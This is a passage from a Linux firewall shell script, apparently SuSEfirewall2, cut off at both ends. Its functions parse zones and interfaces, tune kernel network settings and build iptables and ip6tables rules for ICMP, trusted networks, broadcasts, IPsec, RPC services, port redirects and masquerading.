in "$STATUSDIR/status/zones/"*; do z=${z##*/} [ "$z" != '*' ] || break z=${z//[^A-Za-z0-9]/_} eval v="\$zone_$d" if [ -z "$v" ]; then rm -rf "$STATUSDIR/status/zones/$z" else eval local seen_$z=1 fi done for z in $all_zones; do eval [ -n "\"\$seen_$z\"" ] && continue mkdir "$STATUSDIR/status/zones/$z" done } write_status() { [ "$MODE" != "debug" ] || return [ "$FW_WRITE_STATUS" != "no" ] || return write_interface_status write_zone_status } parse_interfaces() { local zone devs any_zone=false for zone in $all_zones; do evaluateinterfaces $zone eval devs="\$FW_DEV_$zone" if [ -n "$devs" ]; then any_zone=true fi done if [ -z "$FW_ZONE_DEFAULT" ]; then FW_ZONE_DEFAULT='ext' else any_zone=true fi # detect the situation when no zones have been defined at all which means # we have some "don't care/don't know" user, probably a desktop PC, they # expect certain things to work out of the box if [ $any_zone = true ]; then FW_CONFIGURED=true else FW_CONFIGURED=false fi } process_masq_dev() { local devs="" local dev set -- $FW_MASQ_DEV for dev in "$@" ; do if [ "$dev" = 'auto' ]; then warning "ignoring deprecated interface 'auto' in FW_MASQ_DEV" continue fi # zone specified? if [ "$dev" != "${dev#zone:}" ]; then dev=${dev#zone:} if eval [ -n "\"\$zone_$dev\"" ]; then eval devs="\"\$devs \$FW_DEV_$dev\"" continue fi fi case "$dev" in *:*) continue; ;; esac devs="$devs $dev" done FW_MASQ_DEV="$devs" } load_customrules() { ### Load custom rules if [ -n "$FW_CUSTOMRULES" ]; then source_safe "$FW_CUSTOMRULES" if [ $? -eq 0 ]; then message "Firewall custom rules loaded from $FW_CUSTOMRULES" else die 1 "Failed to load custom rules" fi fi } check_interfaces() { local v for zone in $all_zones; do eval v="\$FW_DEV_$zone" [ -n "$v" ] && return done warning 'no interface active' } verify_parameters() { if [ "$FW_ROUTE" = no ]; then if [ "$FW_MASQUERADE" = yes ]; then warning 'FW_ROUTE needs to be set to yes for masquerading to work!' fi if [ "$FW_ALLOW_CLASS_ROUTING" = yes ]; then warning 'FW_ROUTE needs to be set to yes for FW_ALLOW_CLASS_ROUTING to work!' fi if [ "$FW_ALLOW_PING_DMZ" = yes -o "$FW_ALLOW_PING_EXT" = yes ]; then warning 'FW_ROUTE needs to be set to yes for FW_ALLOW_PING_EXT and/or FW_ALLOW_PING_DMZ to work!' fi fi if [ "$FW_MASQUERADE" = no ]; then [ -n "$FW_MASQ_NETS" -a "$FW_MASQ_NETS" != "0/0" ] && warning 'FW_MASQ_NETS needs FW_MASQUERADE set to yes to work!' [ -n "$FW_FORWARD_MASQ" ] && warning 'FW_FORWARD_MASQ needs FW_MASQUERADE set to yes to work!' fi } # Turn ip forwarding on if configured switch_on_ip_forwarding() { if [ -z "$orig_ipv4_forwarding" ]; then # save the original value before we overwrite it. needed in # fw_after_finished orig_ipv4_forwarding=`cat /proc/sys/net/ipv4/ip_forward` fi local yes_no="$1" local new_value=0 [ "$yes_no" = "yes" ] && new_value=1 # global forwarding setproc $new_value /proc/sys/net/ipv4/ip_forward # iterare over each single interface, too, because they may be decoupled # from the global setting if [ "$FW_KERNEL_SECURITY" != "no" ]; then for i in /proc/sys/net/ipv4/conf/*; do setproc $new_value $i/forwarding done fi } # warn user if device to masquerade is from a non private network # 0/0 has to be skipped here, otherwise the spoof rules would block # anything verify_masq_nets() { local nets net1 for nets in $FW_MASQ_NETS ; do IFS=, eval set -- \$nets net1="$1" # skip 0/0 test "$net1" = "0/0" && continue IFS=/ eval set -- \$net1 [ -z "$2" ] && continue case "$1" in 10.*|172.1[6789].*|172.2[0-9].*|172.3[01].*|192.168.*) ;; *) warning "The network $net1 you want to masquerade is not from a private network " \ 'like 10.0.0.0/8, 172.16.0.0/12 or 192.168.0.0/16' esac done } ################################# # Configuring more kernel stuff # ################################# set_proc_stuff() { if [ "$FW_KERNEL_SECURITY" != no ]; then setproc 1 /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts # test "$FW_ALLOW_PING_FW" = yes || setproc 1 /proc/sys/net/ipv4/icmp_echo_ignore_all # XXX setproc 1 /proc/sys/net/ipv4/ip_always_defrag # XXX not there? setproc 1 /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses setproc 5 /proc/sys/net/ipv4/icmp_echoreply_rate setproc 5 /proc/sys/net/ipv4/icmp_destunreach_rate setproc 5 /proc/sys/net/ipv4/icmp_paramprob_rate setproc 6 /proc/sys/net/ipv4/icmp_timeexceed_rate setproc 20 /proc/sys/net/ipv4/ipfrag_time for i in /proc/sys/net/ipv4/conf/*; do setproc 1 $i/log_martians setproc 0 $i/bootp_relay setproc 0 $i/proxy_arp setproc 1 $i/secure_redirects #setproc 0 $i/accept_redirects # let kernel decide this setproc 0 $i/accept_source_route setproc 1 $i/rp_filter done setproc 1 /proc/sys/net/ipv4/route/flush fi } # Make input/forward chains create_chains() { local iptables local zone target for iptables in "$IPTABLES" "$IP6TABLES"; do for target in input forward; do for zone in $all_zones; do $iptables -N ${target}_${zone} done done done } # accept a packet coming from ext zone: # create_cond_chain ACCEPT in ext # reject paket leaving int zone: # create_cond_chain REJECT out int create_cond_chain() { local iptables dir local zone target chain chain devs local check target="$1" dir="$2" zone="$3" chain="${target}_if_${dir}_${zone}" eval check=\"\$${chain}_created\" [ -z "$check" ] || return eval devs="\$FW_DEV_$zone" for iptables in "$IPTABLES" "$IP6TABLES"; do $iptables -N $chain for dev in $devs; do $iptables -A $chain -j $target -${dir:0:1} $dev done done eval ${chain}_created=1 } ### configurations ### parse_configurations() { local var zone configurations config for zone in $input_zones; do var="FW_CONFIGURATIONS_`cibiz $zone`" eval configurations="\"\$$var\"" for config in $configurations; do local TCP='' local UDP='' local RPC='' local IP='' local BROADCAST='' local RELATED='' local MODULES='' local ACCEPT='' # XXX: could use a sub shell in order to enforce use of known variables only for CDIR in $CONFIGURATIONSDIR_0 $CONFIGURATIONSDIR_1; do source_safe $CDIR/$config && break done if [ $? -ne 0 ]; then warning "config '$config' not available" continue fi for var in TCP UDP RPC IP; do eval [ -n \"\$$var\" ] \&\& FW_SERVICES_`cibiz $zone`_$var="\"\$FW_SERVICES_`cibiz $zone`_$var \$$var\"" done if [ -n "$BROADCAST" ]; then var=FW_ALLOW_FW_BROADCAST_`cibiz $zone` eval allow="\"\$$var\"" if [ "$allow" != 'yes' ]; then # 'no' is ignored later anyways eval $var="\"\$$var \$BROADCAST\"" fi fi if [ -n "$RELATED" ]; then eval FW_SERVICES_ACCEPT_RELATED_`cibiz $zone`="\"\$FW_SERVICES_ACCEPT_RELATED_`cibiz $zone` \$RELATED\"" fi if [ -n "$ACCEPT" ]; then eval FW_SERVICES_ACCEPT_`cibiz $zone`="\"\$FW_SERVICES_ACCEPT_`cibiz $zone` \$ACCEPT\"" fi if [ -n "$MODULES" ]; then eval FW_LOAD_MODULES="\"\$FW_LOAD_MODULES \$MODULES\"" fi done done } ### handling of broadcasts ### check_convert_old_broadcast() { if [ -n "$FW_ALLOW_FW_BROADCAST" -o -n "$FW_IGNORE_FW_BROADCAST" ]; then need oldbroadcast convert_old_broadcast fi } drop_broadcast() { local allow ignore port zone for zone in $input_zones; do eval allow="\$FW_ALLOW_FW_BROADCAST_`cibiz $zone`" eval ignore="\$FW_IGNORE_FW_BROADCAST_`cibiz $zone`" local match="-A input_$zone -m pkttype --pkt-type broadcast" for port in $allow; do [ $port = no -o $port = yes ] && continue $LAA $IPTABLES $match -p udp --dport $port ${LOG}"-ACC-BCAST${zone:0:1} " $IPTABLES $match -p udp --dport $port -j "$ACCEPT" done if [ "$ignore" != 'yes' ]; then for port in $ignore; do [ $port = no ] && continue $IPTABLES $match -p udp --dport $port -j "$DROP" done if [ "$allow" != 'yes' ]; then $LDA $IPTABLES $match ${LOG}"-DROP-BCAST${zone:0:1} " fi fi if [ "$allow" != 'yes' ]; then $IPTABLES $match -j "$DROP" # no need to send icmp for broadcasts fi done } ### zones ### parse_zones() { local zone for zone in $FW_ZONES; do case $zone in [Ii][Nn][Tt]|[Ee][Xx][Tt]|[Dd][Mm][Zz]) error "FW_ZONES=$zone ignored" ;; *) if [ "$zone" != "${zone//[^A-Za-z0-9]/_}" ]; then error "ignoring invalid zone name $zone in FW_ZONES" else all_zones="$all_zones $zone" fi ;; esac done for zone in $all_zones; do eval "zone_$zone=0" done } remove_unused_zones() { local zone zones devs for zone in $all_zones; do eval devs="\$FW_DEV_$zone" if [ -n "$devs" -o "$ipsec_chain" = $zone -o "$FW_ZONE_DEFAULT" = "$zone" ]; then if [ -z "$zones" ]; then zones=$zone else zones="$zones $zone" fi fi done [ "$all_zones" != "$zones" ] && all_zones="$zones" } # convert if built in zone, eg ext -> EXT cibiz() { case $1 in int) echo INT ;; ext) echo EXT ;; dmz) echo DMZ ;; *) echo "$1" ;; esac } # returns zero if the firewall is currently considered to be running, non-zero # otherwise is_firewall_running() { /bin/systemctl -q is-active SuSEfirewall2 || return 1 } # returns a safe identifier to use for the iptables comment module # input: # $1: the base identifier to use # output: # $id: the resulting id string comment_id() { id="$1" # avoid spaces in this label id=`echo $id | /usr/bin/tr ' ' ','` id="sfw2.$id" } # return comment options for adding comments to rules # these comments help to identify rules in later invocations of this script, # for incrementally removing them, for example # input # $1: unique identifier for the comment # output # $comment: resulting identifier comment_pars() { local id comment_id "$1" comment="-m comment --comment $id" } # gets the insert position for incremental updates of rule sets during # update-rpc mode # # input # # $1: the chain where the insertion shall occur # # output # # $pos: the insertion number to pass to 'iptables -I <chain> <pos>' get_insert_pos() { local chain="$1" local id comment_id "insert.pos" # see the comments in drop_all() and remove_matching_rules() for more # about this # just select the first matching rule in case there are multiple ones # (logging rule for example) pos=`$IPTABLES_BIN -S "$chain" | /usr/bin/tail -n+2 | /usr/bin/cat -n | /usr/bin/grep "\"$id\"" | /usr/bin/grep -o '^[[:space:]]*[0-9]\+' | /usr/bin/head -n 1` } # get the iptables parameters for inserting an rpc rule to a given chain # # input # # $1: boolean, whether we're running in update-rpc mode, thus incremental rule # insertion is required # $2: the chain where the insertion shall occur # # output # # $rpc_insert: the parameters to add to iptables to achieve the desired # insertion get_rpc_insert_pars() { local update_rpc="$1" local chain="$2" if $update_rpc; then local pos get_insert_pos $chain rpc_insert="-I $chain $pos" else rpc_insert="-A $chain" fi } ### IPsec ### parse_ipsec() { if [ "$FW_IPSEC_TRUST" = yes ]; then ipsec_chain="int" elif [ "$FW_IPSEC_TRUST" = no ]; then : elif [ -n "$FW_IPSEC_TRUST" ]; then for zone in $all_zones; do if [ "$FW_IPSEC_TRUST" = "$zone" ]; then ipsec_chain="$zone" break; fi done if [ -z "$ipsec_chain" ]; then warning "FW_IPSEC_TRUST: $FW_IPSEC_TRUST is no valid zone" fi fi } allow_ipsec() { if [ -n "$ipsec_chain" ]; then $IPTABLES -A INPUT -j "input_$ipsec_chain" $IPSEC_INPUT_MATCH $IPTABLES -A FORWARD -j "forward_$ipsec_chain" $IPSEC_INPUT_MATCH $IPTABLES -A FORWARD -j "forward_$ipsec_chain" $IPSEC_OUTPUT_MATCH fi } ##################################### # Rule split up - forking to chains # ##################################### # ipv4 and ipv6 fork_to_chains() { local iptables local zone local dev local devs local var val for iptables in "$IPTABLES" "$IP6TABLES"; do for zone in $saved_input_zones; do var="FW_PROTECT_FROM_`cibiz $zone`" eval val="\"\$$var\"" if [ "$val" = 'notrack' ]; then # already have rules for that continue fi if [ -n "$FW_ZONE_DEFAULT" -a "$FW_ZONE_DEFAULT" = "$zone" ]; then # default rule will catch it continue fi eval devs="\$FW_DEV_$zone" for dev in $devs; do $iptables -A INPUT -j input_$zone -i $dev done done if [ -n "$FW_ZONE_DEFAULT" -a "$FW_ZONE_DEFAULT" != 'no' ]; then $iptables -A INPUT -j "input_$FW_ZONE_DEFAULT" fi if [ "$FW_ROUTE" = yes ]; then for zone in $forward_zones; do eval devs="\$FW_DEV_$zone" for dev in $devs; do $iptables -A FORWARD -j forward_$zone -i $dev done done fi done } # ipv4 and ipv6 finish_chains() { local iptables for iptables in "$IPTABLES" "$IP6TABLES"; do # anything which is now not in the input_* chains is evil $LDAC $iptables -A INPUT ${LOG}"-IN-ILL-TARGET " $iptables -A INPUT -j "$DROP" $LDAC $iptables -A FORWARD ${LOG}"-FWD-ILL-ROUTING " if [ "$FW_ROUTE" = yes ]; then $iptables -A FORWARD -j "$DROP" # this is an unneeded rule, but looks nice :) fi # we want to let locally generated packets out since our task is not # to protect the world from us, but protect us from the world ;) # policy is ACCEPT $iptables -A OUTPUT -j ACCEPT done # MSS stuff needs this? if [ "$FW_ROUTE" = yes ]; then $IPTABLES -I FORWARD -p tcp --tcp-flags SYN,RST SYN -j TCPMSS --clamp-mss-to-pmtu fi } # Protect the firewall from the internal network? # # # optional parameters: # $1: mode (currently only update-rpc: don't modify, just collect zones) protect_from_internal() { local iptables zone devs dev chain local newzones= local mode=$1 for zone in $input_zones; do if [ "$zone" = "int" -a "$FW_PROTECT_FROM_INTERNAL" = "no" ]; then val="no" warning "FW_PROTECT_FROM_INTERNAL is deprecated, use FW_PROTECT_FROM_INT instead" else var="FW_PROTECT_FROM_`cibiz $zone`" eval val="\"\$$var\"" fi if [ "$val" != notrack -a "$val" != no ]; then if [ -z "$newzones" ]; then newzones="$zone" else newzones="$newzones $zone" fi elif [ "$mode" = "update-rpc" ]; then continue elif [ "$val" = notrack ]; then eval devs="\$FW_DEV_$zone" for dev in $devs; do for iptables in "$IPTABLES" "$IP6TABLES"; do $iptables -t raw -i $dev -I PREROUTING -j CT --notrack $iptables -t raw -o $dev -I OUTPUT -j CT --notrack $iptables -i $dev -I INPUT -j ACCEPT $iptables -o $dev -I OUTPUT -j ACCEPT done done elif [ "$val" = no ]; then chain=input_$zone for iptables in "$IPTABLES" "$IP6TABLES"; do $LAA $iptables -A $chain ${LOG}"-`rulelog $chain`-ACC-ALL " $iptables -A $chain -j "$ACCEPT" done fi done if [ "$input_zones" != "$newzones" ]; then saved_input_zones="$input_zones" # need that for fork_to_chains input_zones="$newzones" fi } allow_related() { local var local services target service proto net local iptables zone chain for zone in $input_zones; do chain=input_$zone var="FW_SERVICES_ACCEPT_RELATED_`cibiz $zone`" eval services="\"\$$var\"" local service for service in $services; do IFS=, eval set -- \$service net="${1:-0/0}" proto="$2" port="$3" sport="$4" iptables="$IPTABLES $IP6TABLES" case "$net" in *:*) iptables="$IP6TABLES" ;; [0-9]*.*.*.*) iptables="$IPTABLES" ;; esac if check_proto_port "$proto" "$port" "$sport" "$var"; then for iptables in $iptables; do $LAA $iptables -A $chain -s $net $proto $rport $rsport -m conntrack --ctstate RELATED ${LOG}"-`rulelog $chain`-REL " $iptables -A $chain -s $net $proto $rport $rsport -j ACCEPT -m conntrack --ctstate RELATED done fi done done } # ICMP stuff allow_icmp() { local chain dev itype zone devs # INPUT ICMP rules if [ "$FW_ALLOW_FW_SOURCEQUENCH" != "no" ]; then for chain in $input_zones; do chain=input_$chain $LAA $IPTABLES -A $chain ${LOG}"-`rulelog $chain`-ACC-SQUENCH " -p icmp --icmp-type source-quench $IPTABLES -A $chain -j "$ACCEPT" -p icmp --icmp-type source-quench done fi if [ "$FW_ALLOW_PING_FW" != no ]; then for chain in $input_zones; do chain=input_$chain $LAA $IPTABLES -A $chain ${LOG}"-`rulelog $chain`-ACC-PING " -p icmp --icmp-type echo-request $IPTABLES -A $chain -j "$ACCEPT" -p icmp --icmp-type echo-request $LAA $IP6TABLES -A $chain ${LOG}"-`rulelog $chain`-ACC-PING " -p icmpv6 --icmpv6-type echo-request $IP6TABLES -A $chain -j "$ACCEPT" -p icmpv6 --icmpv6-type echo-request done fi # not needed as there is a generic accept rule for ICMP RELATED packets # local icmp_types="$safe_icmp_replies" # for itype in $icmp_types; do # for chain in $input_zones; do # chain=input_$chain # $IPTABLES -A $chain ${LOG}"-`rulelog $chain`-ACC-ICMP " -m conntrack --ctstate ESTABLISHED,RELATED -p icmp --icmp-type $itype # $IPTABLES -A $chain -j "$ACCEPT" -m conntrack --ctstate ESTABLISHED,RELATED -p icmp --icmp-type $itype # done # done # icmp_types="$safe_icmpv6_replies" # for itype in $icmp_types; do # for chain in $input_zones; do # chain=input_$chain # $IP6TABLES -A $chain ${LOG}"-`rulelog $chain`-ACC-ICMP " -m conntrack --ctstate ESTABLISHED,RELATED -p icmpv6 --icmpv6-type $itype # $IP6TABLES -A $chain -j "$ACCEPT" -m conntrack --ctstate ESTABLISHED,RELATED -p icmpv6 --icmpv6-type $itype # done # done # DROP rules for input ICMP are after trusted handling (see below) # state matching for these does not work icmp_types="$stateless_icmpv6_types" for itype in $icmp_types; do for chain in $input_zones; do chain=input_$chain $LAA $IP6TABLES -A $chain ${LOG}"-`rulelog $chain`-ACC-ICMP " -p icmpv6 --icmpv6-type $itype $IP6TABLES -A $chain -j "$ACCEPT" -p icmpv6 --icmpv6-type $itype done done $IP6TABLES -A OUTPUT -j "$ACCEPT" -p icmpv6 # XXX: some are not catched by conntrack, should be fixed in kernel } allow_forward_icmp_echo() { [ "$FW_ROUTE" != "yes" ] && return local zone chain var val # FORWARD ICMP rules for zone in $forward_zones; do var="FW_ALLOW_PING_`cibiz $zone`" eval val="\"\$$var\"" [ "$val" != yes ] && continue eval devs="\$FW_DEV_$zone" for dev in $devs; do for chain in $forward_zones; do [ "$chain" = "$zone" ] && continue chain=forward_$chain $LAA $IPTABLES -A $chain ${LOG}"-`rulelog $chain`-ACC-PING " -p icmp --icmp-type echo-request -o $dev $IPTABLES -A $chain -j "$ACCEPT" -m conntrack --ctstate NEW -p icmp --icmp-type echo-request -o $dev $LAA $IP6TABLES -A $chain ${LOG}"-`rulelog $chain`-ACC-PING " -p icmpv6 --icmpv6-type echo-request -o $dev $IP6TABLES -A $chain -j "$ACCEPT" -m conntrack --ctstate NEW -p icmpv6 --icmpv6-type echo-request -o $dev done done chain=forward_$zone $LAA $IPTABLES -A $chain ${LOG}"-`rulelog $chain`-ACC-PING " -p icmp --icmp-type echo-reply $IPTABLES -A $chain -j "$ACCEPT" -m conntrack --ctstate ESTABLISHED -p icmp --icmp-type echo-reply $LAA $IP6TABLES -A $chain ${LOG}"-`rulelog $chain`-ACC-PING " -p icmpv6 --icmpv6-type echo-reply $IP6TABLES -A $chain -j "$ACCEPT" -m conntrack --ctstate ESTABLISHED -p icmpv6 --icmpv6-type echo-reply done # drop rule for forwarding chains are at the end of the forwarding rules } ############################# # Trusted Networks Handling # ############################# process_trusted_nets() { local nets net chain for nets in $FW_TRUSTED_NETS; do IFS=, eval set -- \$nets net="$1" proto="$2" port="$3" # choose the ipv4/6 tables depending on the kind of subnet address # encountered ipxtables=`get_iptables $net` if [ -n "$4" ]; then error "Too many arguments in FW_TRUSTED_NETS -> $nets" elif [ -z "$net" ]; then error "network parameter of FW_TRUSTED_NETS is empty -> $nets" elif [ -z "$proto" -a -n "$port" ]; then error "need to specify protocol for port $port in FW_TRUSTED_NETS" elif check_proto_port "$proto" "$port" "" 'FW_TRUSTED_NETS'; then for chain in $input_zones; do # trusted networks can be on any interface ... chain=input_$chain $LAC $ipxtables -A $chain ${LOG}"-`rulelog $chain`-ACC-TRUST " -m conntrack --ctstate NEW -s $net $proto $port $LAA $ipxtables -A $chain ${LOG}"-`rulelog $chain`-ACC-TRUST " -s $net $proto $port $ipxtables -A $chain -j "$ACCEPT" -m conntrack --ctstate NEW,ESTABLISHED,RELATED -s $net $proto $port done fi done } # determine port numbers of rpc services and generate a suitable iptables # parameter fragment # # parameters: # $1: names of rpc services, e.g. ypbind mountd or a comma separated tuple # like 192.168.1.0/24,_rpc_,nfs rpcservicerules() { # The -rpcinfo script by default implicitly adds extra rules for portmap # itself. This is because portmap needs to be reached in order for other # rpc services to work at all. perl "$SCRIPTSDIR/SuSEfirewall2-rpcinfo" "$1" } # parameters: # $1: REJECT|DROP # optional: # $2: mode (currently only update-rpc) # $3: service (for update-rpc mode) reject_or_drop_services() { local action="$1" local var local services target service proto net port local iptables zone chain local mode="$2" selected="$3" local update_rpc=false [ "$mode" = "update-rpc" ] && update_rpc=true eval target=\$$action for zone in $input_zones; do chain=input_$zone var="FW_SERVICES_${action}_`cibiz $zone`" eval services="\"\$$var\"" local rpc_insert get_rpc_insert_pars $update_rpc $chain local service for service in $services; do IFS=, eval set -- \$service net="${1:-0/0}" proto="$2" port="$3" sport="$4" iptables_list=$IPTABLES_LIST case "$net" in *:*) iptables_list="$IP6TABLES" ;; [0-9]*.*.*.*) iptables_list="$IPTABLES" ;; esac if [ "$proto" = "_rpc_" ]; then [ -n "$selected" -a "$selected" != $port ] && continue local comment comment_pars "rpc.$port" rpcservicerules $service | while read ARG; do for iptables in $iptables_list; do $LDC $iptables $rpc_insert $comment ${LOG}"-`rulelog $chain`-$action " -m conntrack --ctstate NEW $ARG $iptables $rpc_insert $comment -j "$target" $ARG done done elif $update_rpc; then # don't add any other rules in update rpc mode continue elif check_proto_port "$proto" "$port" "$sport" "$var"; then for iptables in $iptables_list; do $LDA $iptables -A $chain -s $net $proto $port $sport -m conntrack --ctstate NEW ${LOG}"-`rulelog $chain`-$action " $iptables -A $chain -s $net $proto $port $sport -m conntrack --ctstate NEW -j "$target" done fi done done } # optional parameters # $1: mode (currently only update-rpc: used for selectively updating RPC # rules) # $2: selected service (for mode = update-rpc, to restrict to certain service) accept_services() { local var local services target service proto net local iptables zone chain local ipt_recent_update ipt_recent_set ipt_recent_rcheck local mode="$1" selected="$2" local update_rpc=false [ "$mode" = "update-rpc" ] && update_rpc=true for zone in $input_zones; do chain=input_$zone var="FW_SERVICES_ACCEPT_`cibiz $zone`" eval services="\"\$$var\"" local rpc_insert get_rpc_insert_pars $update_rpc $chain local service for service in $services; do ipt_recent_update='' ipt_recent_set='' ipt_recent_rcheck='' IFS=, eval set -- \$service if [ "$#" -lt 1 ]; then error "too few parameters in $var -> $service" continue fi net="${1:-0/0}" proto="$2" port="$3" sport="$4" while [ "$#" -gt 4 ]; do case "$5" in hitcount=*) ipt_recent_update="$ipt_recent_update --hitcount ${5#*=}"; shift ;; blockseconds=*) ipt_recent_update="$ipt_recent_update --seconds ${5#*=}"; shift ;; recentname=*) ipt_recent_update="$ipt_recent_update --name ${5#*=}" ipt_recent_set="$ipt_recent_set --name ${5#*=}" shift ;; *) error "unknown parameter $5 in $var -> $service"; continue 2 ;; esac done if [ -n "$ipt_recent_update" ]; then ipt_recent_rcheck="-m recent --rcheck$ipt_recent_update" ipt_recent_update="-m recent --update$ipt_recent_update" ipt_recent_set="-m recent --set$ipt_recent_set" fi iptables_list=$IPTABLES_LIST case "$net" in *:*) iptables_list="$IP6TABLES" ;; [0-9]*.*.*.*) iptables_list="$IPTABLES" ;; esac if [ "$proto" = "_rpc_" ]; then [ -n "$selected" -a "$selected" != "$port" ] && continue local comment comment_pars "rpc.$port" rpcservicerules $service | while read ARG; do for iptables in $iptables_list; do if [ -n "$ipt_recent_set" ]; then $LDC $iptables $rpc_insert $comment ${LOG}"-`rulelog $chain`-DROPr " $ARG -m conntrack --ctstate NEW $ipt_recent_rcheck $iptables $rpc_insert $comment -j "$DROP" $ARG -m conntrack --ctstate NEW $ipt_recent_update fi $LAC $iptables $rpc_insert $comment ${LOG}"-`rulelog $chain`-ACC " -m conntrack --ctstate NEW $ARG $LAA $iptables $rpc_insert $comment ${LOG}"-`rulelog $chain`-ACC " $ARG [ -n "$ipt_recent_set" ] && $iptables $rpc_insert $comment -j ACCEPT $ARG -m conntrack --ctstate NEW $ipt_recent_set $iptables $rpc_insert $comment -j ACCEPT $ARG done done elif $update_rpc; then # don't add any other rules in update rpc mode continue elif check_proto_port "$proto" "$port" "$sport" "$var"; then for iptables in $iptables_list; do if [ -n "$ipt_recent_set" ]; then $LDC $iptables -A $chain ${LOG}"-`rulelog $chain`-DROPr " -s $net $proto $port $sport -m conntrack --ctstate NEW $ipt_recent_rcheck $iptables -A $chain -j "$DROP" -s $net $proto $port $sport -m conntrack --ctstate NEW $ipt_recent_update fi $LAC $iptables -A $chain -s $net $proto $port $sport -m conntrack --ctstate NEW ${LOG}"-`rulelog $chain`-ACC " $LAA $iptables -A $chain -s $net $proto $port $sport ${LOG}"-`rulelog $chain`-ACC " [ -n "$ipt_recent_set" ] && $iptables -A $chain -s $net $proto $port $sport -j ACCEPT -m conntrack --ctstate NEW $ipt_recent_set $iptables -A $chain -s $net $proto $port $sport -j ACCEPT done fi done done } # optional parameters: # $1: limit the rules to the given service, if given, otherwise all configured # services are used # optional envvar: # add_portmapper: whether to add rules for portmapper itself (boolean, # default: true) # update_rpc: whether we're running in update-rpc mode (boolean, default: # false) allow_rpc_services() { local zone chain services comment local selected="$1" [ -z "$add_portmapper" ] && add_portmapper=true [ -z "$update_rpc" ] && update_rpc=false for zone in $input_zones; do chain=input_$zone eval services="\$FW_SERVICES_`cibiz $zone`_RPC" # explicitly add portmapper ourselves, otherwise -rpcinfo will # add it each time, causing duplicate rules $add_portmapper && [ ! -z "$services" ] && services="$services portmapper" local rpc_insert get_rpc_insert_pars $update_rpc $chain local service for service in $services; do # skip not matching services for incremental updates [ -n "$selected" -a "$selected" != "$service" -a "$service" != "portmapper" ] && continue comment_pars "rpc.$service" rpcservicerules $service | while read ARG; do for iptables in $IPTABLES_LIST; do $LAC $iptables $rpc_insert $comment ${LOG}"-`rulelog $chain`-ACC-RPC " -m conntrack --ctstate NEW $ARG $LAA $iptables $rpc_insert $comment ${LOG}"-`rulelog $chain`-ACC-RPC " $ARG $iptables $rpc_insert $comment -j "$ACCEPT" $ARG done done done done } allow_ip_services() { local proto zone iptables protos for zone in $input_zones; do chain=input_$zone eval protos="\$FW_SERVICES_`cibiz $zone`_IP" for iptables in "$IPTABLES" "$IP6TABLES"; do for proto in $protos; do $LAA $iptables -A $chain ${LOG}"-`rulelog $chain`-ACC-IP " -p $proto $iptables -A $chain -j "$ACCEPT" -p $proto done done done } allow_tcp_services() { local port zone iptables ports for zone in $input_zones; do chain=input_$zone eval ports="\$FW_SERVICES_`cibiz $zone`_TCP" for iptables in "$IPTABLES" "$IP6TABLES"; do for port in $ports; do $LAC $iptables -A $chain ${LOG}"-`rulelog $chain`-ACC-TCP " -p tcp --dport $port --syn $LAA $iptables -A $chain ${LOG}"-`rulelog $chain`-ACC-TCP " -p tcp --dport $port $iptables -A $chain -j "$ACCEPT" -p tcp --dport $port done done done } # UDP Stuff allow_udp_services() { local port zone iptables ports for zone in $input_zones; do chain=input_$zone eval ports="\$FW_SERVICES_`cibiz $zone`_UDP" for iptables in "$IPTABLES" "$IP6TABLES"; do for port in $ports; do $LAA $iptables -A $chain ${LOG}"-`rulelog $chain`-ACC-UDP " -p udp --dport $port $iptables -A $chain -j "$ACCEPT" -p udp --dport $port done done done } warn_highports() { if [ -n "$FW_ALLOW_INCOMING_HIGHPORTS_UDP" ]; then warning "FW_ALLOW_INCOMING_HIGHPORTS_UDP is obsolete, ignored" fi if [ -n "$FW_ALLOW_INCOMING_HIGHPORTS_TCP" ]; then warning "FW_ALLOW_INCOMING_HIGHPORTS_TCP is obsolete, ignored" fi } # construct -s/-d pairs with correct negation net2srcdst() { local name="$1" local value=${2#\!} if [ -z "$value" ]; then echo "${name}_src=" echo "${name}_dst=" echo "${name}_neg=" return fi local neg= if [ "$2" != "$value" ]; then neg='! ' echo "${name}_neg=1" else echo "${name}_neg=" fi echo "${name}_src=\"$neg-s $value\"" echo "${name}_dst=\"$neg-d $value\"" } # redirect packets from one port to another, opens ports in input_* redirect_rules() { local chain nets proto port1 port2 local net1 net1_neg net1_src net1_dst local net2 net2_neg net2_src net2_dst local redirectinstalled for nets in $FW_REDIRECT; do IFS=, eval set -- \$nets net1="$1" net2="$2" proto="$3" port1="$4" port2="$5" if [ -n "$6" ]; then error "Too many arguments in FW_REDIRECT -> $nets" elif [ -z "$net1" -o -z "$net2" -o -z "$proto" ]; then error "Missing parameter in FW_REDIRECT -> $nets" elif [ "$proto" != tcp -a "$proto" != udp ]; then error "FW_REDIRECT supports only tcp and udp -> $nets" else if [ -n "$port1" ]; then port1="--dport $port1" fi if [ -n "$port2" ]; then port2="--to-ports $port2" fi eval `net2srcdst net1 "$net1"` eval `net2srcdst net2 "$net2"` $IPTABLES -A PREROUTING -t mangle -j MARK -p $proto $net1_src $net2_dst $port1 --set-mark $mark_redir $IPTABLES -A PREROUTING -t nat -j REDIRECT -p $proto $net1_src $net2_dst $port1 $port2 redirectinstalled=1 fi done if [ -n "$redirectinstalled" ]; then for chain in $input_zones; do chain=input_$chain $LAC $IPTABLES -A $chain ${LOG}"-`rulelog $chain`-ACC-REDIR " -m mark --mark $mark_redir -m conntrack --ctstate NEW $LAA $IPTABLES -A $chain ${LOG}"-`rulelog $chain`-ACC-REDIR " -m mark --mark $mark_redir -m conntrack --ctstate NEW,ESTABLISHED,RELATED $IPTABLES -A $chain -j "$ACCEPT" -m conntrack --ctstate NEW,ESTABLISHED,RELATED -m mark --mark $mark_redir done fi } allow_class_routing() { local chain iface devs zone iptables if [ "$FW_ALLOW_CLASS_ROUTING" = 'yes' ]; then FW_ALLOW_CLASS_ROUTING="$forward_zones" elif [ "$FW_ALLOW_CLASS_ROUTING" = 'no' ]; then return fi # assuming that only traffic from $zone interface enter the # forward_$zone chain anyways, we don't need the -i parameter for zone in $FW_ALLOW_CLASS_ROUTING; do eval devs="\$FW_DEV_$zone" chain=forward_$zone for iface in $devs; do for iptables in "$IPTABLES" "$IP6TABLES"; do $LAA $iptables -A $chain $LOG"-`rulelog $chain`-ACC-CLASS " -o $iface $iptables -A $chain -j "$ACCEPT" -o $iface done done done } allow_related_forward_icmp() { local chain itype for chain in $forward_zones; do chain=forward_$chain for itype in $safe_icmp_replies; do $LAA $IPTABLES -A $chain ${LOG}"-`rulelog $chain`-FWD-RELA" -m conntrack --ctstate 